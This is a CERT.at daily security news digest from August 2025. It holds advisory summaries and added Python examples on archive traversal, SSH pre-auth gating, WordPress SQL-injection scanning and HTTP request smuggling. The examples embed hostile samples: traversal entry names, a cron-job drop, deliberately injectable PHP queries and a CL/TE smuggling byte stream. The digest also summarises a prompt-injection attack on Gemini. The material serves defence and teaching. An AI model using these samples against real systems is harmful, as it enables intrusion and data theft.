https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Virtual…
∗∗∗ 40,000 WordPress Sites Affected by Arbitrary File Read Vulnerability in UiCore Elements WordPress Plugin ∗∗∗
---------------------------------------------
On June 13th, 2025, we received a submission for an Arbitrary File Read vulnerability in UiCore Elements, a WordPress plugin with more than 40,000 active installations. This vulnerability makes it possible for an unauthenticated attacker to read arbitrary files on the server, which can contain sensitive information. During the disclosure process, our investigation revealed that the vulnerability leveraged an underlying issue in Elementor’s import functionality.
---------------------------------------------
https://www.wordfence.com/blog/2025/08/40000-wordpress-sites-affected-by-ar…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, kernel-rt, and python-requests), Debian (ca-certificates-java), Fedora (chromium, clash-meta, mingw-python3, openjpeg, php-adodb, and toolbox), Mageia (kernel and kernel-linus), SUSE (chromium, ImageMagick, libgcrypt, libssh, libxml2, opensc, postgresql14, and postgresql16), and Ubuntu (dnsmasq, linux-gcp-6.8, linux-raspi, linux-oracle-6.14, and openjdk-17).
---------------------------------------------
https://lwn.net/Articles/1033445/
∗∗∗ Vtenext 25.02: A three-way path to RCE ∗∗∗
---------------------------------------------
Multiple vulnerabilities in vtenext 25.02 and prior versions allow unauthenticated attackers to bypass authentication through three separate vectors, ultimately leading to remote code execution on the underlying server.
---------------------------------------------
https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/
∗∗∗ OMSA-2025-0004: Omnissa Workspace ONE UEM addresses multiple vulnerabilities (CVE-2025-25229, CVE-2025-25231) ∗∗∗
---------------------------------------------
https://www.omnissa.com/omsa-2025-0004/
∗∗∗ OMSA-2025-0003: Omnissa Secure Email Gateway (SEG) updates address Server-Side Request Forgery (SSRF) vulnerability (CVE-2025-25235) ∗∗∗
---------------------------------------------
https://www.omnissa.com/omsa-2025-0003/
∗∗∗ Matrix protocol vulnerabilities fixed in room version 12 ∗∗∗
---------------------------------------------
https://matrix.org/blog/2025/08/security-release/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 08-08-2025 18:00 − Monday 11-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ WinRAR zero-day flaw exploited by RomCom hackers in phishing attacks ∗∗∗
---------------------------------------------
A recently fixed WinRAR vulnerability tracked as CVE-2025-8088 was exploited as a zero-day in phishing attacks to install the RomCom malware. [..] The flaw is a directory traversal vulnerability that was fixed in WinRAR 7.13, which allows specially crafted archives to extract files into a file path selected by the attacker.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploit…
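CVE-2025-8088 is an instance of the generic archive-traversal problem: the extractor trusts the entry name stored in the archive and writes wherever it points. The check below is an added example written for this report, not WinRAR code and not anything from the RomCom sample. It builds a small zip in memory with constructed entries and shows the predicate a safe extractor applies to every name before writing; the destination /tmp/extract is an assumption for illustration. The predicate goes beyond the WinRAR case in that it also rejects absolute and drive-letter names, which are the other two ways an entry name can choose the output location.

```python
import io
import posixpath
import zipfile


def is_safe_member(name, dest="/tmp/extract"):
    """True if an archive member name resolves to a path inside dest.

    Works on the stored name only, so the same predicate applies to zip,
    tar or any other container that lets the creator choose entry names.
    """
    dest = posixpath.normpath(dest)
    # Treat backslashes as separators too: Windows extractors do.
    normalized = name.replace("\\", "/")
    if not normalized or normalized.startswith("/"):
        return False                      # empty name or absolute POSIX path
    if len(normalized) > 1 and normalized[1] == ":":
        return False                      # drive-letter path such as C:/...
    target = posixpath.normpath(posixpath.join(dest, normalized))
    # commonpath collapses to a parent (or "/") if target escaped dest.
    return posixpath.commonpath([dest, target]) == dest


def audit_archive(zip_bytes, dest="/tmp/extract"):
    """Split an in-memory zip's member names into (safe, unsafe) lists without extracting."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    safe = [n for n in names if is_safe_member(n, dest)]
    unsafe = [n for n in names if not is_safe_member(n, dest)]
    return safe, unsafe


def build_sample_zip():
    """Constructed test archive (not a real sample): one benign entry, three escapes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")          # stays under dest
        zf.writestr("../../evil.bat", "echo pwned")      # parent-directory traversal
        zf.writestr("/etc/cron.d/job", "* * * * * id")   # absolute path
        zf.writestr("C:/Users/Public/drop.exe", "MZ")    # drive-letter path
    return buf.getvalue()


if __name__ == "__main__":
    safe, unsafe = audit_archive(build_sample_zip())
    print("safe:  ", safe)
    print("unsafe:", unsafe)
```

Python's own zipfile.extractall strips such components on its own, and tarfile gained the data filter in Python 3.12 and the security backports; the point of carrying the predicate separately is that the same rule can gate any archive library, or be run over a quarantined archive before it is handed to a third-party extractor such as the one in the advisory.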
∗∗∗ Command Injection in Jenkins via Git Parameter (CVE-2025-53652) ∗∗∗
---------------------------------------------
On July 9, Jenkins disclosed CVE-2025-53652 (aka SECURITY-34191), one of 31 plugin vulnerabilities announced that day. [..] was disclosed as medium severity, but it enables command injection via the Jenkins Git Parameter plugin. [..] Around 15,000 Jenkins servers appear to allow unauthenticated access, making RCE viable in the wild. [..] The patch can be disabled, so detection remains important even after upgrading.
---------------------------------------------
https://www.vulncheck.com/blog/git-parameter-rce
∗∗∗ EU law to protect journalists from spyware takes effect ∗∗∗
---------------------------------------------
Critics from press freedom groups say member states have not taken steps to give the law any teeth.
---------------------------------------------
https://therecord.media/eu-law-to-protect-journalists-from-spyware-takes-ef…
∗∗∗ Security vulnerabilities: hacker cracks car via the manufacturer's web portal ∗∗∗
---------------------------------------------
He was not only able to remotely locate, unlock and start countless other people's cars, but also to query owner data at will. [..] Zveare presented his findings last Sunday at Def Con in Las Vegas. According to the report, he was able to create a "national administrator account" in the dealer portal in question and thereby obtained far-reaching access that is "reserved for only a few select corporate users" and enabled "a variety of fun exploits".
---------------------------------------------
https://www.golem.de/news/sicherheitsluecken-hacker-knackt-auto-ueber-webpo…
∗∗∗ Espionage: smoke detectors turned into listening bugs ∗∗∗
---------------------------------------------
Two young security researchers uncovered security vulnerabilities in Halo 3C smart smoke detectors at Def Con in Las Vegas. [..] The manufacturer of the Halo 3C detectors goes by the name IPVideo and, according to its website, has been part of Motorola Solutions since 2023. According to the Wired report, the company has already provided a firmware update to close the vulnerabilities discovered by Garcia and his colleague. Cloud-connected devices are expected to receive the update automatically.
---------------------------------------------
https://www.golem.de/news/spionage-smarte-rauchwarnmelder-in-abhoerwanzen-v…
∗∗∗ Researchers Reveal ReVault Attack Targeting Dell ControlVault3 Firmware in 100+ Laptop Models ∗∗∗
---------------------------------------------
Cybersecurity researchers have uncovered multiple security flaws in Dell's ControlVault3 firmware and its associated Windows APIs that could have been abused by attackers to bypass Windows login, extract cryptographic keys, and maintain access even after a fresh operating system install by deploying undetectable malicious implants into the firmware. [..] Attackers can chain the vulnerabilities, which were presented at the Black Hat USA security conference, to escalate their privileges after initial access, bypass authentication controls, and maintain persistence on compromised systems that survives operating system updates or reinstallations.
---------------------------------------------
https://thehackernews.com/2025/08/researchers-reveal-revault-attack.html
∗∗∗ DEF CON hackers plug security holes in US water systems amid tsunami of threats ∗∗∗
---------------------------------------------
A DEF CON hacker walks into a small-town water facility … no, this is not the setup for a joke or a (super-geeky) odd-couple rom-com. It's a true story that happened at five utilities across four states.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/08/10/def_con_hack…
∗∗∗ libarchive: Vulnerability turns out to be critical ∗∗∗
---------------------------------------------
The open-source compression library libarchive has a vulnerability that was initially rated as low risk only. [..] Tobias Stöckmann originally reported the flaw to the libarchive project, together with a proof-of-concept exploit, on 10 May this year. On 20 May the developers released libarchive version 3.8.0. The public vulnerability report followed on 9 June, also on GitHub. There the CVE number CVE-2025-5914 was assigned, initially with a CVSS score of 3.9, risk "low", which is how Red Hat classified the flaw.
---------------------------------------------
https://www.heise.de/news/libarchive-Sicherheitsluecke-entpuppt-sich-als-kr…
∗∗∗ Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild ∗∗∗
---------------------------------------------
CVE-2025-32433 allows for remote code execution in sshd for certain versions of Erlang programming language’s OTP. We reproduced this CVE and share our findings.
---------------------------------------------
https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/
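The entry gives only the outcome. The Erlang/OTP advisory for CVE-2025-32433 describes the root cause as SSH connection-protocol messages being processed before user authentication had completed; that description is added here from the advisory, not restated on this page. The toy dispatcher below, written in Python rather than Erlang and not taken from OTP's ssh application, shows the single state check that matters: message numbers 80-127 (the connection-protocol range in RFC 4250) must be refused until authentication has succeeded. The message sequences and credentials are constructed for the demo.

```python
# SSH message numbers from RFC 4253 (transport, userauth) and RFC 4254 (connection).
SSH_MSG_SERVICE_REQUEST = 5
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
# RFC 4250 section 4.1.2 reserves 80-127 for the connection protocol.
CONNECTION_PROTOCOL_MSGS = range(80, 128)


class ProtocolViolation(Exception):
    """Raised when a peer sends a message its current state does not allow."""


class SshServerSim:
    """Toy server-side dispatcher. Only the state machine is modelled; key
    exchange, real credential checks and channel windows are omitted."""

    def __init__(self, gate_connection_msgs, valid_credentials):
        self.gate = gate_connection_msgs          # False reproduces the flaw class
        self.credentials = valid_credentials      # constructed: {"user": "password"}
        self.authenticated = False
        self.channels = set()
        self.executed = []

    def handle(self, msg_type, payload):
        # The fix in one line: nothing from the connection protocol is
        # dispatched until the userauth layer has said yes.
        if self.gate and msg_type in CONNECTION_PROTOCOL_MSGS and not self.authenticated:
            raise ProtocolViolation(f"message {msg_type} before authentication")
        if msg_type == SSH_MSG_SERVICE_REQUEST:
            return
        if msg_type == SSH_MSG_USERAUTH_REQUEST:
            self.authenticated = self.credentials.get(payload["user"]) == payload["password"]
            return
        if msg_type == SSH_MSG_CHANNEL_OPEN:
            self.channels.add(payload["channel"])
            return
        if msg_type == SSH_MSG_CHANNEL_REQUEST:
            if payload["channel"] not in self.channels:
                raise ProtocolViolation("request on unknown channel")
            if payload["type"] == "exec":
                self.executed.append(payload["command"])   # where RCE would happen
            return
        raise ProtocolViolation(f"unhandled message {msg_type}")

    def run(self, messages):
        for msg_type, payload in messages:
            self.handle(msg_type, payload)
        return list(self.executed)


# Constructed message sequences (not captured traffic).
PRE_AUTH_EXEC = [
    (SSH_MSG_SERVICE_REQUEST, {"service": "ssh-connection"}),
    (SSH_MSG_CHANNEL_OPEN, {"channel": 0, "type": "session"}),
    (SSH_MSG_CHANNEL_REQUEST, {"channel": 0, "type": "exec", "command": "id"}),
]
AUTHENTICATED_EXEC = [
    (SSH_MSG_SERVICE_REQUEST, {"service": "ssh-userauth"}),
    (SSH_MSG_USERAUTH_REQUEST, {"user": "alice", "password": "correct horse"}),
] + PRE_AUTH_EXEC[1:]


def demo(gate, messages):
    """Run a sequence against a server with or without the auth gate.
    Returns the executed commands, or a 'rejected: ...' string."""
    server = SshServerSim(gate, {"alice": "correct horse"})
    try:
        return server.run(messages)
    except ProtocolViolation as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print("no gate, unauthenticated:", demo(False, PRE_AUTH_EXEC))
    print("gate, unauthenticated   :", demo(True, PRE_AUTH_EXEC))
    print("gate, authenticated     :", demo(True, AUTHENTICATED_EXEC))
```

Without the gate the unauthenticated sequence reaches the exec handler; with it the session is torn down at the first CHANNEL_OPEN, while the same commands after a successful USERAUTH_REQUEST still work. For detection the useful server-side signal is the same one the gate keys on: connection-protocol messages arriving on a session that never completed authentication.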
∗∗∗ BadCam Attack Turns Trusted Linux Webcams into Stealthy USB Weapons ∗∗∗
---------------------------------------------
A new class of USB-based attacks has come to light. [..] Attackers can now exploit vulnerabilities in commonly used USB webcams running embedded Linux, transforming them into BadUSB devices capable of injecting keystrokes and executing covert operations independently of the host operating system.
---------------------------------------------
https://thecyberexpress.com/badcam-linux-webcam/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base and libxml2), Debian (distro-info-data, gnutls28, modsecurity-crs, and node-tmp), Fedora (chromium, incus, perl, perl-Devel-Cover, perl-PAR-Packer, polymake, varnish, and xen), Red Hat (kernel, kernel-rt, and rhc), and SUSE (chromedriver, ffmpeg-4, go1.23, go1.24, go1.25, govulncheck-vulndb, himmelblau, iperf, keylime-ima-policy, net-tools, sqlite3, texmaker, tomcat, and zabbix).
---------------------------------------------
https://lwn.net/Articles/1033328/
∗∗∗ SQUID-2025:1 Buffer Overflow in URN Handling ∗∗∗
---------------------------------------------
https://github.com/squid-cache/squid/security/advisories/GHSA-w4gv-vw3f-29g3
∗∗∗ Xerox® FreeFlow® Core v8.0.5 ∗∗∗
---------------------------------------------
https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Se…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 07-08-2025 18:00 − Friday 08-08-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ New EDR killer tool used by eight different ransomware groups ∗∗∗
---------------------------------------------
A new Endpoint Detection and Response (EDR) killer that is considered to be the evolution of 'EDRKillShifter,' developed by RansomHub, has been observed in attacks by eight different ransomware gangs. Such tools help ransomware operators turn off security products on breached systems so they can deploy payloads, escalate privileges, attempt lateral movement, and ultimately encrypt devices on the network without being detected.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-edr-killer-tool-used-by-…
∗∗∗ Why blow up satellites when you can just hack them? ∗∗∗
---------------------------------------------
Four countries have now tested anti-satellite missiles (the US, China, Russia, and India), but it's much easier and cheaper just to hack them. In a briefing at the Black Hat conference in Las Vegas, Milenko Starcik and Andrzej Olchawa from German biz VisionSpace Technologies demonstrated how easy it is by exploiting vulnerabilities in the software used on the satellites themselves, as well as in the ground stations that control them.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/08/07/balck_hat_sa…
∗∗∗ US confirms takedown of BlackSuit ransomware gang that racked up $370 million in ransoms ∗∗∗
---------------------------------------------
U.S. law enforcement agencies provided new details on an operation that dismantled critical infrastructure used by the BlackSuit ransomware gang after the organization’s leak site was replaced with a takedown banner nearly two weeks ago. The group — which rebranded from its Royal name after a devastating 2023 attack that shut down the city of Dallas — successfully attacked more than 450 entities in the U.S. Since emerging in 2022, the gang secured more than $370 million in ransom payments, according to U.S. investigators.
---------------------------------------------
https://therecord.media/us-confirms-blacksuit-takedown
∗∗∗ Abusing Ubuntu 24.04 features for root privilege escalation ∗∗∗
---------------------------------------------
With the recent release of Ubuntu 24.04, we at Snyk Security Labs thought it would be interesting to examine the latest version of this Linux distribution to see if we could find any interesting privilege escalation vulnerabilities. In this post, we have seen that it only takes the leveraging of one small vulnerability, combined with a number of features, to achieve a chain of exploitation resulting in a full privilege escalation. Even where security controls are in place preventing the direct exploitation of a small vulnerability it may still be possible to finesse limited exploitation potential into a much greater impact.
---------------------------------------------
https://labs.snyk.io/resources/abusing-ubuntu-root-privilege-escalation/
∗∗∗ Oops Safari, I think You Spilled Something ∗∗∗
---------------------------------------------
In February 2023, researchers at Exodus Intelligence discovered a bug in the Data Flow Graph (DFG) compiler of WebKit, the browser engine used by Safari. This bug, CVE-2024-44308, was patched by Apple in November 2024. While it was alive, its exploit was chained with PAC and APRR bypasses on Apple Silicon to yield renderer remote code execution capabilities on macOS and iOS. Such capabilities, and many others including LPEs and RCEs on Windows and Linux, are available to Exodus’ customers.
---------------------------------------------
https://blog.exodusintel.com/2025/08/04/oops-safari-i-think-you-spilled-som…
∗∗∗ 60 Malicious Ruby Gems Used in Targeted Credential Theft Campaign ∗∗∗
---------------------------------------------
Socket’s Threat Research Team has uncovered a long-running supply chain attack in the RubyGems ecosystem. Since at least March 2023, a threat actor using the aliases zon, nowon, kwonsoonje, and soonje has published 60 malicious gems posing as automation tools for Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. These gems deliver their advertised functionality, such as bulk posting or engagement, but covertly exfiltrate credentials (usernames and passwords) to threat actor-controlled infrastructure, which classifies them as infostealer malware.
---------------------------------------------
https://socket.dev/blog/60-malicious-ruby-gems-used-in-targeted-credential-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gdk-pixbuf2, glibc, kernel, kernel-rt, libxml2, and opentelemetry-collector), Fedora (firefox, mingw-opencv, moby-engine, varnish, webkitgtk, xen, and yarnpkg), Oracle (firefox, gdk-pixbuf2, glibc, kernel, libblockdev, libxml2, python-requests, python3.12-setuptools, and qt5-qt3d), Red Hat (libxml2, pcs, and sudo), and SUSE (agama, chromium, dpkg, ghostscript, iperf, kubo, libIex-3_3-32, libpoppler-cpp2, libsoup, libtiff-devel-32bit, nginx, python-urllib3, ruby2.5, tgt, traefik, and traefik2).
---------------------------------------------
https://lwn.net/Articles/1033009/
∗∗∗ CISA Issues ED 25-02: Mitigate Microsoft Exchange Vulnerability ∗∗∗
---------------------------------------------
Today, CISA issued Emergency Directive (ED) 25-02: Mitigate Microsoft Exchange Vulnerability in response to CVE-2025-53786, a vulnerability in Microsoft Exchange server hybrid deployments. ED 25-02 directs all Federal Civilian Executive Branch (FCEB) agencies with Microsoft Exchange hybrid environments to implement required mitigations by 9:00 AM EDT on Monday, August 11, 2025. This vulnerability presents significant risk to all organizations operating Microsoft Exchange hybrid-joined configurations that have not yet implemented the April 2025 patch guidance.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/08/07/cisa-issues-ed-25-02-mit…
∗∗∗ CISA Releases Ten Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/08/07/cisa-releases-ten-indust…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 06-08-2025 18:00 − Thursday 07-08-2025 18:00
Handler: Felician Fuchs
Co-Handler: Guenes Holler
=====================
= News =
=====================
∗∗∗ New Ghost Calls tactic abuses Zoom and Microsoft Teams for C2 operations ∗∗∗
---------------------------------------------
A new post-exploitation command-and-control (C2) evasion method called Ghost Calls abuses TURN servers used by conferencing apps like Zoom and Microsoft Teams to tunnel traffic through trusted infrastructure.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-ghost-calls-tactic-abuse…
∗∗∗ Wave of 150 crypto-draining extensions hits Firefox add-on store ∗∗∗
---------------------------------------------
A malicious campaign dubbed GreedyBear has snuck onto the Mozilla add-ons store, targeting Firefox users with 150 malicious extensions and stealing an estimated $1,000,000 from unsuspecting victims.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/wave-of-150-crypto-draining-…
∗∗∗ Critical Zero-Day Bugs Crack Open CyberArk, HashiCorp Password Vaults ∗∗∗
---------------------------------------------
Secrets managers hold all the keys to an enterprise's kingdom. Two popular ones had longstanding, critical, unauthenticated RCE vulnerabilities.
---------------------------------------------
https://www.darkreading.com/cybersecurity-operations/critical-zero-day-bugs…
∗∗∗ Researchers Uncover ECScape Flaw in Amazon ECS Enabling Cross-Task Credential Theft ∗∗∗
---------------------------------------------
Cybersecurity researchers have demonstrated an "end-to-end privilege escalation chain" in Amazon Elastic Container Service (ECS) that could be exploited by an attacker to conduct lateral movement, access sensitive data, and seize control of the cloud environment.
---------------------------------------------
https://thehackernews.com/2025/08/researchers-uncover-ecscape-flaw-in.html
∗∗∗ How To Find SQL Injection Vulnerabilities in WordPress Plugins and Themes ∗∗∗
---------------------------------------------
SQL Injection (SQLi), a vulnerability almost as old as database-driven web applications themselves (CWE-89), persists as a classic example of failing to neutralize user-supplied input before it's used in a SQL query. So why does this well-understood vulnerability type continue to exist?
---------------------------------------------
https://www.wordfence.com/blog/2025/08/how-to-find-sql-injection-vulnerabil…
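Since the linked post is about finding these bugs, here is an added Python triage script (mine, not Wordfence's) that scans PHP source for $wpdb sinks whose query is assembled from variables without $wpdb->prepare(), and for the subtler case where a variable is interpolated into prepare()'s format string so the placeholders never see it. The PHP excerpt is constructed for the demo, and the regex-based parsing is a triage heuristic rather than a PHP parser.

```python
import re

# Constructed PHP excerpt in the style of a plugin under review (not code
# from any real plugin). Lines 3, 9 and 10 are the ones a reviewer wants
# flagged; lines 5-6 and 11 are fine.
SAMPLE_PHP = """<?php
$id = $_GET['id'];
$rows = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}orders WHERE id = $id");
$name = sanitize_text_field($_POST['name']);
$safe = $wpdb->get_results(
    $wpdb->prepare("SELECT * FROM {$wpdb->prefix}orders WHERE name = %s", $name));
$order = $_GET['order'];
// sanitize_text_field() strips tags; it does not make a value safe for SQL
$wpdb->query("DELETE FROM {$wpdb->prefix}orders ORDER BY " . sanitize_text_field($order));
$count = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM {$wpdb->prefix}orders WHERE id = $id"));
$static = $wpdb->get_var("SELECT COUNT(*) FROM {$wpdb->prefix}orders");
"""

SINK_RE = re.compile(r"\$wpdb->(query|get_results|get_var|get_row|get_col)\s*\(")
# Any PHP variable except $wpdb itself ({$wpdb->prefix} is table naming, not input).
VAR_RE = re.compile(r"\$(?!wpdb\b)[A-Za-z_]\w*")
DQ_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
SQ_STRING_RE = re.compile(r"'(?:[^'\\]|\\.)*'")


def call_argument(src, open_paren):
    """Text between a call's opening parenthesis and its matching close.
    Parentheses inside string literals are not tracked; fine for triage."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return src[open_paren + 1:]


def find_unsafe_wpdb_calls(php_source):
    """Return (line, sink, reason) for each $wpdb sink that looks injectable."""
    findings = []
    for m in SINK_RE.finditer(php_source):
        line = php_source.count("\n", 0, m.start()) + 1
        sink = m.group(1)
        arg = call_argument(php_source, m.end() - 1).strip()
        if arg.startswith("$wpdb->prepare"):
            # prepare() only protects placeholder values; a variable
            # interpolated into the format string is concatenated first.
            inner = call_argument(arg, arg.index("("))
            fmt = DQ_STRING_RE.search(inner)
            if fmt and VAR_RE.search(fmt.group(1)):
                findings.append((line, sink, "variable interpolated into prepare() format string"))
            continue
        # Single-quoted PHP strings do not interpolate, so blank them first.
        if VAR_RE.search(SQ_STRING_RE.sub("''", arg)):
            findings.append((line, sink, "query built from variables without prepare()"))
    return findings


if __name__ == "__main__":
    for line, sink, reason in find_unsafe_wpdb_calls(SAMPLE_PHP):
        print(f"line {line}: $wpdb->{sink}: {reason}")
```

Run against the sample it reports lines 3, 9 and 10. Line 9 is the case the post's question points at: the value passed through a WordPress sanitizer that is meant for output, not for SQL, and an ORDER BY clause that no placeholder type covers. Each hit still needs manual review to confirm the variable is attacker-controlled and to check the capability and nonce checks around it.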
∗∗∗ New Promptware Attack Hijacks User’s Gemini AI Via Google Calendar Invite ∗∗∗
---------------------------------------------
Cybersecurity researchers demonstrate a new attack on Google Gemini AI for Workspace. Discover how a simple calendar invite can be used to perform phishing, steal emails, and even control home appliances.
---------------------------------------------
https://hackread.com/promptware-attack-hijack-gemini-ai-google-calendar-inv…
∗∗∗ Unveiling a New Variant of the DarkCloud Campaign ∗∗∗
---------------------------------------------
In early July 2025, a new DarkCloud campaign was observed in the wild by Fortinet’s FortiGuard Labs team. It began with a phishing email containing an attached RAR archive. I subsequently investigated this campaign and conducted a step-by-step analysis.
---------------------------------------------
https://feeds.fortinet.com/~/922857380/0/fortinet/blogs~Unveiling-a-New-Var…
∗∗∗ HTTP/1.1 must die: the desync endgame ∗∗∗
---------------------------------------------
Upstream HTTP/1.1 is inherently insecure and regularly exposes millions of websites to hostile takeover. Six years of attempted mitigations have hidden the issue, but failed to fix it. This paper introduces several novel classes of HTTP desync attack capable of mass compromise of user credentials.
---------------------------------------------
https://portswigger.net/research/http1-must-die
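The entry states the thesis without showing what a desync is. The following added Python example (mine, not from the PortSwigger paper, and it does not reproduce the paper's new attack classes) shows the classic ambiguity underneath all of them: a request that carries both Content-Length and Transfer-Encoding is framed differently by a parser that honours each header, so two hops disagree about where the next request starts. The byte stream is constructed, not captured.

```python
# Constructed byte stream (not captured traffic): one request carrying both
# framing headers, followed by a legitimate GET from the same connection.
STREAM = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"            # chunked framing: last-chunk, body ends here
    b"\r\n"
    b"G"                # Content-Length framing: sixth and last body byte
    b"GET /next HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"\r\n"
)


def _parse_head(stream, pos):
    """Split the request line and headers; return (request_line, headers, body_start)."""
    end = stream.index(b"\r\n\r\n", pos)
    lines = stream[pos:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def _chunked_body(stream, pos):
    """Decode a chunked body; return (body, position after the terminator)."""
    body = b""
    while True:
        line_end = stream.index(b"\r\n", pos)
        size = int(stream[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            # last-chunk; no trailer fields in the sample, so the next CRLF ends it
            return body, stream.index(b"\r\n", pos) + 2
        body += stream[pos:pos + size]
        pos += size + 2


def frame_requests(stream, policy):
    """policy: 'cl' (Content-Length wins), 'te' (Transfer-Encoding wins, as
    RFC 9112 requires) or 'strict' (refuse a message carrying both)."""
    requests, pos = [], 0
    while pos < len(stream):
        request_line, headers, pos = _parse_head(stream, pos)
        has_cl = "content-length" in headers
        chunked = "chunked" in headers.get("transfer-encoding", "").lower()
        if policy == "strict" and has_cl and chunked:
            raise ValueError(f"ambiguous framing on {request_line!r}")
        if chunked and policy != "cl":
            body, pos = _chunked_body(stream, pos)
        else:
            length = int(headers.get("content-length", "0"))
            body, pos = stream[pos:pos + length], pos + length
        requests.append((request_line, body))
    return requests


def request_lines(stream, policy):
    """Just the request lines each parser believes it saw."""
    return [line for line, _ in frame_requests(stream, policy)]


def rejects_ambiguous(stream):
    """True when the strict policy refuses the stream."""
    try:
        frame_requests(stream, "strict")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("Content-Length parser :", request_lines(STREAM, "cl"))
    print("chunked parser        :", request_lines(STREAM, "te"))
    print("strict parser rejects :", rejects_ambiguous(STREAM))
```

A front end framing by Content-Length forwards the trailing G as the end of the POST body; a back end framing by chunked encoding treats it as the start of the next message and reads a request for GGET /next. Everything the attacker appends after the last-chunk is therefore prepended to the next user's request on the shared upstream connection, which is the mechanism the paper's credential-theft variants build on. RFC 9112 requires chunked framing to win and permits rejecting such messages outright; rejects_ambiguous() is that stricter policy.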
∗∗∗ Malicious npm Packages Target WhatsApp Developers with Remote Kill Switch ∗∗∗
---------------------------------------------
Two npm packages masquerading as WhatsApp developer libraries include a kill switch that deletes all files if the phone number isn’t whitelisted.
---------------------------------------------
https://socket.dev/blog/malicious-npm-packages-target-whatsapp-developers-w…
=====================
= Vulnerabilities =
=====================
∗∗∗ 6,500 Axis Servers Expose Remoting Protocol, 4,000 in U.S. Vulnerable to Exploits ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed multiple security flaws in video surveillance products from Axis Communications that, if successfully exploited, could expose them to takeover attacks.
---------------------------------------------
https://thehackernews.com/2025/08/6500-axis-servers-expose-remoting.html
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (glibc, kernel, libxml2, python-requests, and python-setuptools), Debian (chromium), Fedora (chromium, firefox, gdk-pixbuf2, iputils, libsoup3, libssh, perl, perl-Devel-Cover, perl-PAR-Packer, polymake, and poppler), Gentoo (Composer and Spreadsheet-ParseExcel), Oracle (glibc, kernel, libxml2, python-setuptools, sqlite, and virt:rhel and virt-devel:rhel), Red Hat (libxml2), SUSE (grub2, libarchive, libgcrypt, and python311), and Ubuntu (cifs-utils and poppler).
---------------------------------------------
https://lwn.net/Articles/1032861/
∗∗∗ Increased threat activity against SonicWall Gen 7 firewalls with SSLVPN - immediate measures recommended ∗∗∗
---------------------------------------------
Update, 7 August 2025: added technical indicators for a forensic investigation of potentially affected devices, as well as information on the vulnerability alleged to be relevant.
---------------------------------------------
https://www.cert.at/de/warnungen/2025/8/erhohte-bedrohungsaktivitat-gegen-s…
∗∗∗ Security flaws: Attackers can crash IBM Tivoli Monitoring ∗∗∗
---------------------------------------------
IBM's IT management software Tivoli Monitoring is vulnerable, and attackers can target two security flaws. An update that closes the flaws is available for download.
---------------------------------------------
https://heise.de/-10513072
∗∗∗ EG4 Electronics EG4 Inverters ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-07
∗∗∗ Dreame Technology iOS and Android Mobile Applications ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-06
∗∗∗ Packet Power EMX and EG ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-05
∗∗∗ Rockwell Automation Arena ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-04
∗∗∗ Burk Technology ARC Solo ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-03
∗∗∗ Johnson Controls FX80 and FX90 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-02
